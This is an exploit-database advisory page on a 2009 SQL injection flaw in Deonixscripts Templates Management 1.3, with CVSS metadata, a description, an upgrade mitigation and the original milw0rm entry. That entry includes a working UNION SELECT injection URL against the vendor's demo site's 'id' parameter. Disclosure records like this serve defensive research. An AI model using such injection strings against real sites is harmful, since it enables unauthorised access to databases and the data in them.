Deonixscripts Templates Management Version 1.3 SQL Injection Vulnerability

vendor:

Templates Management

by:

d3b4g

8,8

CVSS

HIGH

SQL Injection

CWE

Product Name: Templates Management

Affected Version From: 1.3

Affected Version To: 1.3

Patch Exists: YES

Related CWE: CVE-2009-2790

CPE: a:deonixscripts:templates_management:1.3

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2009

Deonixscripts Templates Management Version 1.3 SQL Injection Vulnerability

Deonixscripts Templates Management Version 1.3 is prone to an SQL injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. An attacker can exploit this vulnerability to manipulate SQL queries by injecting arbitrary SQL code. This may allow the attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.

Mitigation:

Upgrade to version 1.4 or later, as it has been reported to fix this vulnerability.

Source

Exploit-DB raw data:

--------------------------------------------------------------------------
Deonixscripts Templates Management Version 1.3 SQL Injection Vulnerability

--------------------------------------------------------------------------
 ###################################################
 [+] Author        :  d3b4g
 [+] Email         :  bl4ckend[at]gmail.com
 [+] Twitter       :  twitter.com/schaba
 [+] Vulnerability :  SQL injection
 ###################################################

 () about script:- Web Templates management System allows you to start your own
    Web design business in no time by providing you with an impressive list of 
    features. You can sell individual templates (exclusive or recurring sale) or 
    offer free download to registered members by offering them with free or paid 
    membership. 
 

----------------------------------------------------------------------------------
 () Vulnerability demo :- http://www.site.com/path/index.php?action=readmore&id=(SQL c0de)

 () Live demo :- http://www.deonixscripts.com/demo/tplmgt13/index.php?action=readmore&id=-1+union+select+1,version(),3,4+from+admin--



  # note :- This script is pr0n to multiple sql injection vuln.


 #####################################################
 From Tiny little island of Maldivies

# milw0rm.com [2009-07-24]